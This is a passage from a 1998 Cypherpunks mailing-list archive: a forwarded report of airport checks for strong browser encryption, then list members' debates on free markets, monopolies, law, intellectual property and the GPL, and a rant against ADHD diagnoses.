airports to Ireland and reports that US Secret Service agents checked her
laptop for the domestic 128-bit crypto versions of Netscape Navigator and
Microsoft Internet Explorer at the metal detector station. She said she saw
about six other people who were checked as she was going through. As is now
common, anyone carrying a laptop computer was asked to boot it up,
presumably to demonstrate that if the case hid a bomb at least it was
programmable with a reasonable looking user interface. But in her instance,
people who identified themselves as Secret Service agents had her start up
her web browser so they could check the encryption level, and made her
uninstall her 128-bit Navigator.

It didn't seem to matter to them that there are exemptions for devices that
are for personal use as long as they are kept with the person while out of
the country, or that she is an international banker who was going to conduct
business with an overseas office. They didn't bother to determine whether
she had a copy of the Navigator install file in a backup directory and could
simply reinstall on the airplane. And of course it made no difference that
she was going to Ireland where she picked up a locally produced 128-bit
crypto plugin for Navigator that she says works just as well if not better
than the version from Netscape. (I don't know if her "plugin" is simply one
of the scripts that enable the Netscape strong crypto in the export
version.)

 -- Sidney Markowitz <sidney@communities.com>

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rod Logic <rodlogic@yahoo.com>
Date: Mon, 5 Oct 1998 00:23:01 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <19981005051303.12542.rocketmail@send101.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain








_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 5 Oct 1998 00:43:33 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810042014.PAA32418@einstein.ssz.com>
Message-ID: <4.0.2.19981004140550.00a73a20@shell11.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



> > Except for police intervention, anyone is free to buy coke
> > from dealers affiliated with the Crips, affiliated with the
> > Bloods, or affiliated with any one of several smaller
> > providers of such services.

At 03:14 PM 10/4/98 -0500, Jim Choate wrote:
> Really? I dare you to wear the colors of a Crip and then sell in the Bloods
> neighborhood.

It is not necessary to wear colors when buying drugs. 

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     NNyzlfFoQPvD+PpoSEHWiAEieWio2L2mK86eLP83
     4TkkfRz3u+9afancvskOlFITdjJ+TM0dazEUQsv4s
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 5 Oct 1998 01:13:44 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Another question about free-markets...
In-Reply-To: <199810050453.XAA01444@einstein.ssz.com>
Message-ID: <199810050614.XAA14618@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:53 PM 10/4/98 -0500, Jim Choate wrote:
> Now in a free-market, by definition, there is no law. What
> then is the responsibility of businesses other than the
> pure unadulterated pursuit of profit? 

None whatsoever.

> If this includes lying, denying consumers information, etc.
> what harm is done, they have fulfilled their responsibility
> to their shareholders (potentialy quite lucratively) 

While there is a sucker born every minute, the strategy you
describe is for the most part unlikely to be profitable.

> Within this environment it follows that a primary strategy
> for such executives is the elimination of *all*
> competition.

Fortunately the most cost effective method of eliminating all
competition is that followed by Alcoa, to deliver a
satisfactory product at the cheapest possible price.

In the cocaine market a number of organizations have
attempted to employ other methods for eliminating
competition, but here in America these methods have generally
proved not only unprofitable, but also for the most part
fatal. 

    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     GyHvJ0Mh5TLXWeuRFFAMR+C9RlwfJf71h1IZ/fFt
     4+Ev0QZVg+BYgSXjL4IgOBonA/OwuM11NaPGTgMxr
-----------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.


http://www.jim.com/jamesd/      James A. Donald




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Mon, 5 Oct 1998 01:02:23 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: Capitalism and Monopolies (was RE: GPL & commercial software, the critical distinction)
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7A15@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




Jim Choate wrote:
> Only after the early 1890's when the situation got so bad 
> they had to do something. Prior to that there was no federal 
> intervention in railroad operations per se 

Completely false. Traffic to/from the West coast did not warrant the
capital investment in transcontinental railway, so the government make
*exclusive* lands grants to specific railroads to extend the railways to
the West coast (100M acres between 1863-7) . Those subsidies created the
monopolies, the source of coercive power over Western farmers. Protest
against this arbitrary power was blamed on the market instead of the
government subsidies, and resulted in the Interstate Commerce Act of
1887, and the Sherman Act of 1890. 

I should have stated government "distortions" instead of "regulation."
That includes subsidies.

> And every drop of mineral rights in this country is owned 
> by oil companies or the US government as a result of the 
> conflicts that took place from the late 1800's to the 
> early 1900's.

The placement (ownership) of these rights, their value, restrictions and
enforcement are the result of a free market? No, government
intervention.

> Actualy the local and state regulators did that back in the 
> late 50's and early 60's the federals had no hand in it.

Did anyone ever state monopolies result from federal regulations?
Government distortion/intervention, that can come at any level. Acts of
force or coercion can create a monopolistic situation, free trade
cannot.

> Bullshit math. The interactions are nowhere near as simple as 
> you state. The big company has the resources to outlast the 
> smaller company in any industry that can monopolize (an issue
> you seem to miss, not all industries can monopolize)

So what is the discriminating factor(s) distinguishing industries that
can and cannot be monopolized?

Don't forget capital markets; a free fluid capital market can and will
support a smaller competitor if potential long term profits will support
it. I will qualify that we do not have a very free capital market, it
currently favors larger businesses. The answer is to deregulate the
capital market. Even with our heavily regulated capital markets this
works often.

> Examples please where a small firm dukes it out (sic) on 
> equal terms with a larger one...

Equality is about freedom of action, not status or result. Amazon vs
Barnes & Noble, Yahoo vs NBC, Red Hat vs Microsoft, etc.

I see the egalitarian perversion of "equality" polluting arguments
against free market capitalism. Equal states and "game" like fairness
and handicapping is not ideal, Freedom is ideal.

> > In one of those nordic countries, I think Finland, the phone
> > system was never made a public enterprise or state regulated
> > monopoly, but most other things were.
> 
> Then how does it operate? Who owns the switches and wires? 
> Either it's a public utility or it's some sort of private
> enterprise (though it may by under contract to the government).

However buys and installs the switches and wires. There is no artificial
barriers such as right-of-way restrictions, exclusive franchise,
utilities commission, or nationalization. There are many competing
telecom companies, all the way to local loop.

> > There is no "natural monopoly" that is not somewhere a
> 
> A 'natural' monoploy, to my mind, is a company that operates 
> in an industry that can be saturated.

That's a perverted definition of 'natural' monopoly. A 'natural'
monopoly involves something where all or none must benefit (e.g.
military defense) or something based on a severely scarce resource (e.g.
real estate to your house).

Market saturation is a natural effect of free competition, the number of
firms it takes is irrelevant, and competition is not barred by
artificial restraint, only profit. If a firm abuses its position
competition can and will capitalize on the opportunity. A coercive
monopoly is one that is immune to market constraints (supply and demand)
-- that requires artificial barriers.

> The VCR industry is a great example of a 'natural' monopoly. 

You must be joking. I could enter the video recording/playback equipment
market tomorrow with sufficient capitalization and turn good profits in
5 years. I didn't say VCR because that is terribly myopic, the market
demand is the function not the technology. Technology and innovation is
a natural destabilizer to monopoly positions.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Mon, 5 Oct 1998 02:05:23 +0800
To: "'Cypherpunks Distributed Remailer'" <cypherpunks@EINSTEIN.ssz.com>
Subject: RE: I thought of an initialy regulated industry!... (fwd)
In-Reply-To: <199810050447.XAA01383@einstein.ssz.com>
Message-ID: <000601bdf02f$a5f26fa0$7e8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate retorted to my statement:

:> They never have to worry about who has more or less, who is better or worse,
:> or who knows better than anyone what is best for everyone.  It's all been
:> pre-established and exists incontrovertibly in their national consumer database.
:
: It would be nice if  you said something other than "I disagree". It would
: really be nice if you cold describe specific examples and hypothesis, but
: that obviously is asking too much.
............................................................................


Why, where do you see any "I disagree" statement?

And really, I don't mind providing specific examples and hypotheses -  can you give me an idea where
I might look for these?

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Mon, 5 Oct 1998 01:34:23 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: Another question about free-markets...
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7A16@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> Now in a free-market, by definition, there is no law.

A free market is not the absence of law (that is anarchy), a free market
is the absence of government intervention in trade and commerce.

That does not mean people and businesses are immune from criminal law,
fraud statutes, civil liability, etc.

> If this includes lying, denying consumers information,

The market addresses information disclosure by favoring vendors that
disclose. The legal system addresses intentional misinformation.

You are confusing Laissez Faire [free market] Capitalism with
Anarcho-Capitalism.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Mon, 5 Oct 1998 01:53:18 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7A17@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




"Corruptissima republicae, plurimae leges."

-- Tacitus


> -----Original Message-----
> From: Robert Hettinga [mailto:rah@shipwright.com]

> Most criminologists will tell that the more corrupt the 
> jurisdiction, the harder it is to be in compliance with 
> the law. That way, it's easier for the state's 
> functionaries to shake you down.

> "'If we could just pass a few more laws', we could all be 
> criminals!"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Mon, 5 Oct 1998 02:18:56 +0800
To: "'Cypherpunks Distributed Remailer'" <cypherpunks@EINSTEIN.ssz.com>
Subject: RE: Another question about free-markets...
In-Reply-To: <199810050453.XAA01444@einstein.ssz.com>
Message-ID: <000801bdf031$9232abe0$7e8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Jim Choate:

: Now in a free-market, by definition, there is no law. What then is the
: responsibility of businesses other than the pure unadulterated pursuit of
: profit? If this includes lying, denying consumers information, etc. what
: harm is done, they have fulfilled their responsibility to their shareholders
: (potentialy quite lucratively) and broken no law. Within this environment it
: follows that a primary strategy for such executives is the elimination of
: *all* competition. And since there is no law other than the measure of profit
: all can be justified.
................................................................................


There might be no Law.   But there would still be Reality  -  and for some people, this is *much*
harder to deal with.

If customers sit around like lumps on a log depending upon the kindness of strangers, well they're
not doing themselves any favors.  But such a person is not a customer.  They are an invalid (or will
be, eventually).

In a free-market economy, everybody - not only corporations, not only customers - have to be
rational about what they're doing.   Everybody has to "be on their toes", alert to what truly is in
their interest, and prevent themselves from accepting, from supporting, self-defeating offers from
Trojans bearing spam.   You learn or you die, just like in the movies.


    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Mon, 5 Oct 1998 02:29:51 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7A18@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> Explain further, from your description of the differences there 
> are no fundamental mentionings or views of intellectual property.
> As a matter of fact the specific role of the individual is never 
> even mentioned in either definition.

Intellectual property is fundamentally unenforceable in an anarchic
state (you have no govt), at least in the manner we have now, whereas a
Laissez Faire state could enforce it (you have limited govt). That says
nothing about whether IP should exist in current form or at all, simply
that it *could* exist under LF.

I don't support the current path IP law is headed, but I support the
underlying basis for intellectual property rights, as do most LF
advocates.

There are many different takes on anarchism, from those that include
coercion as a market (and marketable) element to those where it is
prohibited, but without the state (rational anarchy). Therefore it is
difficult to discriminate the differences other than limited government
versus no government.

> So people don't have a right to self-defence? I agree 
> consensual crimes are not crimes.

No, you certainly have a right to self-defense.

>> "What, then, is law? It is the collective organization of the
individual
>> right to lawful defense."

> Is it?

Is it? No. Should it be? Yes.

> Or is it simply another sort of coercion to cooperate with the
> collective?

Yes.

"Nowhere has the coercive and parasitic nature of the State been more
clearly limned than by the great late nineteenth-century German
sociologist, Franz Oppenheimer. Oppenheimer pointed out that there are
two and only two mutually exclusive means for man to obtain wealth. One,
the method of production and voluntary exchange, the method of the free
market, Oppenheimer termed the 'economic means'; the other, the method
of robbery by the use of violence, he called the 'political means.' The
political means is clearly parasitic, for it requires previous
production for the exploiters to confiscate, and it subtracts from
rather than adding to the total production in society. Oppenheimer then
proceeds to define the State as the 'organization of the political
means' -the systematization of the predatory process over a given
territorial area."
    -- Murray Rothbard on Franz Oppenheimer's  _Der Staat_

> I'm interesting to see how you reconcile the belief nobody 
> has a right to use force yet has a right to defend their 
> life.

Abolition of *coercive* force. Defensive force I promote.

>>"For what are our faculties but the extension of our 
>>individuality? And what is property but an extension 
>>of our faculties?"

> By facluty I assume you mean our emotional and psychological 
> makeup coupled with our sensory record of them.
> 
> I'd say that such issues are not a facet of individualism but 
> rather a characteristic of life itself.

That was a quote from Frederick Bastiat, not me. Faculty is a broad
term, your cognitive faculty is physiological, but your rational faculty
(your mind) is really the essence of individuality. You are more
correct, your individuality is derived from your faculty, your faculty
is derived from the nature of man.

> No it doesn't. You must first prove that a group of 
> individuals have some right that as individuals they don't have.

Absolutely not and no they don't. What part did you miss? A group is
simply a collection of individuals, therefore holds no more rights nor
less rights than any single member, nor does any member sacrifice any
rights by participating in a group.

> For one thing, even in your definition, rights are a 
> fundamental aspect of birth as an individual.

Rights are based on the nature of reality (survival).

"In order to sustain its life, every living species has to follow a
certain course of action required by its nature. The action required to
sustain human life is primarily intellectual: everything man needs has
to be discovered by his mind and produced by his effort. Production is
the application of reason to the problem of survival...

Since knowledge, thinking, and rational action are properties of the
individual, since the choice to exercise his rational faculty or not
depends on the individual, man's survival requires that those who think
be free of the interference of those who don't. Since men are neither
omniscient nor infallible, they must be free to agree or disagree, to
cooperate or pursue their own independent course, each according to his
own rational judgement. Freedom is the fundamental requirement of man's
mind...

The social recognition of man's rational nature--of the connection
between his survival and his use of reason--is the concept of
*individual rights*.

..."rights" are a moral principle defining and sanctioning a man's
freedom of action in a social context...

...man has to work and produce in order to support his life. He has to
support his life by his own effort and by the guidance of his own mind.
If he cannot dispose of the product of his effort, he cannot dispose of
his effort; if he cannot dispose of his effort, he cannot dispose of his
life. Without property rights, no other rights can be practiced." -- Ayn
Rand

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Mon, 5 Oct 1998 04:40:44 +0800
To: <cypherpunks@einstein.ssz.com>
Subject: RE: I thought of an initialy regulated industry!... (fwd)
Message-ID: <000c01bdf045$4c5b3f60$7e8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Jim Choate:

: The bottem line as to why free-market economies don't work is that it isn't
: in the producers best interest to have a educated consumer.  They might buy
: somebody elses product or start their own company. Both of those are bad for
: profits.
:
: Free-market mavens forget that producers are just as greedy and corrupt as
: everyone else, there is no fair competition in an unregulated market given
: the pshychological make up of human beings.
................................................................................
........


Free market economices don't "work", simply because they are run by humans, who
regularly suffer psychological breakdowns, envy, and mistakes of judgement, not
to mention disreputable marketing departments.   Regulated economies, however,
are run by government drones, and are therefore perfect vehicles which, with
unfailing success, make all of their captive customers happy.

Everyone knows this, as we witness the apparent success of all those regulated
economies overseas which outshine the U.S. by three (maybe four) orders of
magnitude.  No one over there envies the U.S. productivity and standard of
living, and they never are moved to leave and come live over here, to give up
the benefits which extreme regulation confers upon them, in place of the
(admittedly mixed) free-market fiasco which operates over here, where all things
are uncertain and frighteningly unpredictable.

In fact, many people become so disgusted with the monopolies and disfunctional
liberty which exists here, that they regularly expatriate to go live in places
like Sweden, Germany, even Canada, where they have the peace of mind and
assurance that State coercion will provide for their every need  -  in a most
efficient, timely, prompt, and user-friendly manner.

They never have to worry about who has more or less, who is better or worse, or
who knows better than anyone what is best for everyone.  It's all been
pre-established and exists incontrovertibly in their national consumer database.


   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Mon, 5 Oct 1998 04:49:00 +0800
To: <cypherpunks@EINSTEIN.ssz.com>
Subject: RE: Another question about free-markets..
Message-ID: <000e01bdf046$7b509ee0$7e8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Jim Choate:

: Now in a free-market, by definition, there is no law. What then is the
: responsibility of businesses other than the pure unadulterated pursuit of
: profit? If this includes lying, denying consumers information, etc. what
: harm is done, they have fulfilled their responsibility to their shareholders
: (potentialy quite lucratively) and broken no law. Within this environment it
: follows that a primary strategy for such executives is the elimination of
: *all* competition. And since there is no law other than the measure of profit
: all can be justified.
................................................................................


There might be no Law.   But there would still be Reality  -  and for some
people, this is *much* harder to deal with.

If customers sit around like lumps on a log depending upon the kindness of
strangers, well they're not doing themselves any favors.  But such a person is
not a customer.  They are an invalid (or will be, eventually).

In a free-market economy, everybody - not only corporations, not only
customers - have to be rational about what they're doing.   Everybody has to "be
on their toes", alert to what truly is in their interest, and prevent themselves
from accepting, from supporting, self-defeating offers from Trojans bearing
spam.   You learn or you die, just like in the movies.


   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martinus Luther" <martinusl@hotmail.com>
Date: Mon, 5 Oct 1998 08:57:13 +0800
To: cypherpunks@cyberpass.net
Subject: Re: importance of  motivation
Message-ID: <19981005135608.2064.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



>From Tim May:

> Any trendy new diagnosis always gets some recruits...dyslexia, ADD 
>(*), the abuse excuse, etc. (* Like any trendy thing, it gets renamed 
> to keep its panache. ADD has been  renamed to something with four 
> letters, which I now forget (must be ADD).)

And it is worse than that, they're scum, Tim. They claim (in last months 
SciAm) that  5% of kids have ADHD  (some sources have it at 15%).  This 
isn't a disease, this is one end of the normal variation in behaviour. 
It is as if you diagnosed an adult male height of less than 5 foot 4 
inches as "dwarf" and prescribed growth hormone. Or as if you  operated 
on any woman over 5 foot 10 to shorten her legs. 

http://www.nimh.nih.gov/publicat/adhd.htm says 3 to 4 times as many boys 
as girls have it.  So they are saying that ADHD affects 15 to 60 percent 
of all boys! This isn't one end of the normal range of behaviour, this 
is just plain normal.

The psycho-babble establishment is proposing drugging 5 to 15 percent of 
the population to alter their behaviour.   If this "diagnosis" had been 
around when I was a kid they would have drugged me.  I found a 14 point 
checklist for ADHD on the web at:  
http://www.docnet.org.uk/autopage/messages/23.html   In the last 48 
hours my daughter has shown 11 of these. And I've shown 14.  This is 
just normal life they are talking about.

This is the misuse of psychiatric  medicine for political control, as 
much as anything that went on in Stalin's Russia.  (the personal is 
political - if one young man behaves in a way unacceptable to their 
elders that is personal - if  5 million do it is political). I object, 
strongly, to some guy in a white coat saying the problem with my life is 
my brain and he wants me to take this little pill and then it will be 
alright.

Which is not to say that some people don't have real problems for which 
Ritalin is a workaround. But 15%, 10% or even 5% isn't psychiatry it is 
politics.   Large parts of our daily life is tedious, boring, of no 
direct relevance to anything we are interested in.  Most kids in school 
are made to sit through boring lessons. Bloody hell! They made us do 
sport. Is anything more shitlike?

Most adults at work make themselves do things they have no interest in 
other than for the money they might get out of it (which is where we cam 
in with all that discussion about research that shows  that people 
perform less well on  tasks done primarily for reward  -  Marx was right 
about alienation, you know) A  healthy person  *ought* to have trouble 
paying attention to some of the things they are asked to do. Maybe we 
will have better lives if we drug ourselves (Ritalin, Prozak, E, daytime 
television) to get through the shit of the day but let it be a decision 
adults make for themselves, not one imposed on children by parents or 
the psychatric eastablishment.

I could do with a cup of tea...

> We've had some nutballs and losers (luser spelling: loosers) on this 
> list.  People who claim the reason they can't make a coherent 
> argument or hold a  steady job is because of something some 
> psychobabbler told them was their  excuse.

It's weird how people do that. If a doctor gives something a long name 
is suddenly becomes alright.  Some parents are ashamed that their kids 
can't read well. Put it in Greek and call it "Dyslexia" and all of a 
sudden it isn't something you do, or are, or don't do or aren't capable 
of - it becomes something you *have*,  not really part of you, baggage, 
a burden that could one day be dropped, something that has been done to 
you, imposed on you, soemthing that is not your fault.  
Reality  hasn't changed, just the words used to describe it, yet it is 
now less threatening.

The germ theory of disease is stretched to the limit. Pasteur showed 
that some diseases are caused by microorganisms. Simple cause and 
effect. One baterial disease is caused by pone organism, another by 
another.  That is deeply embedded in our thoughts. So now all disease, 
all misfortune, has to be given a name, put in a box and traced back to 
a simple cause.  I'm not fat, I have an eating disorder. I'm not stupid, 
I have a learning disability.  I'm not sad, or worried, or bored, or 
scared - I have depression or an anxiety disorder or an attention 
deficit disorder.  Some societies attribute all misfortune to witchcraft 
- if your cow dies then someone, somewhere must have cursed you.  We now 
attribute all misfortune to something outside ourselves, not part of us.  
It wasn't me, it was my syndrome.   

And its all part of the pressure put on familys by business. Conform, 
consume, keep quiet. Don't rock the boat.  Turn up on time, wear our 
clothes, work our hours.  No alcohol on the premises. Or at lunchtime. 
Take this here drugs test - we don't want dope fiends and hippies in our 
office.  

Stressed out? Bored? Overworked? Tense, anxious, nervous soul-ache? 
Nothing acts faster than Ritalin. Especially when cut with Prozac to 
prolong that cool, mellow feeling.

Time off to look after the children? Not if you want the job to be open 
when you come back. Just give them a bite of our magic apple and they 
will be alright.

What's that you say about drugs? No, these are  Good Drugs. The men in 
the white coats say so. And what's more they are patentable and we own 
shares in Ciba Geigy, Lilly, Fison's  and Hoffman La Roche. Good Drugs 
keep you working until we want to let you go. Good Drugs keep you 
consuming until you have no more money to pay us with. Good drugs keep 
you working for our profit.  Good Drugs keep you from complaining, 
striking,  joining a union, praying, helping, loving, singing, fighting 
back in any way whatsoever. Good Drugs keep you from realising that half 
your work goes into  our pockets. Good Drugs keep you scared, scared of 
poverty, scared of being different, scared of standing out, scared of 
using your head to think any thoughts we don't want thank. Good Drugs 
keep you addicted to your job, your country, your government, your boss. 
The Best Drug is the mortgage.


John the Ranter/

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Campbell <rick@campbellcentral.org>
Date: Mon, 5 Oct 1998 06:06:05 +0800
To: rms@gnu.org
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199809301621.KAA09089@wijiji.santafe.edu>
Message-ID: <199810051105.HAA13894@germs.dyn.ml.org>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3997.1071713807.multipart/signed"

--Boundary..3997.1071713807.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

    Date: Wed, 30 Sep 1998 10:21:42 -0600
    From: Richard Stallman <rms@santafe.edu>
    
    It isn't surprising that people who want to write non-free software
    are disappointed that the GNU project won't help them.  What is
    amazing is that they feel this is unfair.  They have no intention of
    letting me use their source code in my programs--so why should they be
    entitled to use my source code in their programs?  These people seem
    to think that their selfishness entitles them to special treatment.

This is faulty logic.  I may wish to write some code for free, that
is, have the intention of letting you use my source code in your
programs, and to write other code for profit.  If I want to write
something for free, I'd like it to be free for any purpose, including
commercial purposes, thus the GPL is inappropriate.

I would vastly prefer that people simply place their code in the
public domain explicitly.

			Rick


--Boundary..3997.1071713807.multipart/signed
Content-Type: application/octet-stream; name="pgp00000.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00000.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4zaWEK
Q29tbWVudDogUHJvY2Vzc2VkIGJ5IE1haWxjcnlwdCAzLjQsIGFuIEVtYWNz
L1BHUCBpbnRlcmZhY2UKCmlRQ1ZBd1VCTmhpbjNoSWU5MVViOERjRkFRR0RM
UVFBajRtQnVYUHlXUUNMMWFiWmZSL1dEcHdmdXdVaFZoRWgKMGdSMGlKaFJF
b2ZualpHdWN0YThHaUhvYjNEWGlRZ1JWMzJoM2ZsZDNteWQraWNZTXRBNkJH
YVI2ZmZ4aUQvKwpYYzZRWnhyejhnMWNCdFJtQU5adVpreUt5QmpHZkRxYXd5
YWFKd243Zm0rbHBKaWFnT2I4WVlwUXNQWkFIdzhaCjJRVDZqTWQ0SG1BPQo9
VTIvMAotLS0tLUVORCBQR1AgTUVTU0FHRS0tLS0tCg==
--Boundary..3997.1071713807.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 5 Oct 1998 07:08:42 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Another question about free-markets... (fwd)
Message-ID: <199810051212.HAA02813@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 5 Oct 1998 10:03:25 +0100
> From: Steve Mynott <stevem@tightrope.demon.co.uk>
> Subject: Re: Another question about free-markets...

> On Sun, Oct 04, 1998 at 11:53:28PM -0500, Jim Choate wrote:
> 
> > Now in a free-market, by definition, there is no law. What then is the
> 
> no in a free market there is no state
> 
> there are laws based on natural rights

Ok, who writes the laws? Who enforces the laws? Who decides what is natural?

Remember, we have *NO* participants in a free market other than the producer
and the consumer. Two, and *only* two, parties are involved.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 5 Oct 1998 07:10:27 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199810051214.HAA02867@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: GPL & commercial software, the critical distinction (fwd)
> Date: Mon, 5 Oct 1998 00:29:33 -0700 

> state (you have no govt), at least in the manner we have now, whereas a
> Laissez Faire state could enforce it (you have limited govt). That says
> nothing about whether IP should exist in current form or at all, simply
> that it *could* exist under LF.

[other stuff deleted]

Ok, so you're talking out of both sides of your mouth then. On one hand you
speak of a free-market (vis-a-vis Laissez Faire) and then in the same
breath, with not even a blink of an eye, you speak of limited government.

You can't have your cake and eat it too. Sorry.

This is gibberish.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 5 Oct 1998 07:11:48 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: Another question about free-markets... (fwd)
Message-ID: <199810051216.HAA02918@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: Another question about free-markets...
> Date: Sun, 4 Oct 1998 23:34:09 -0700 

> > Now in a free-market, by definition, there is no law.
> 
> A free market is not the absence of law (that is anarchy), a free market
> is the absence of government intervention in trade and commerce.

And how does government intervene and interfere? By making law.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 5 Oct 1998 07:25:38 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Capitalism and Monopolies (was RE: GPL & commercial software, the (fwd)
Message-ID: <199810051230.HAA02994@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
> Subject: Capitalism and Monopolies (was RE: GPL & commercial software, the
> 	 critical distinction)
> Date: Sun, 4 Oct 1998 23:01:16 -0700 

> Jim Choate wrote:
> > Only after the early 1890's when the situation got so bad 
> > they had to do something. Prior to that there was no federal 
> > intervention in railroad operations per se 
> 
> Completely false.

Not totaly.

> Traffic to/from the West coast did not warrant the
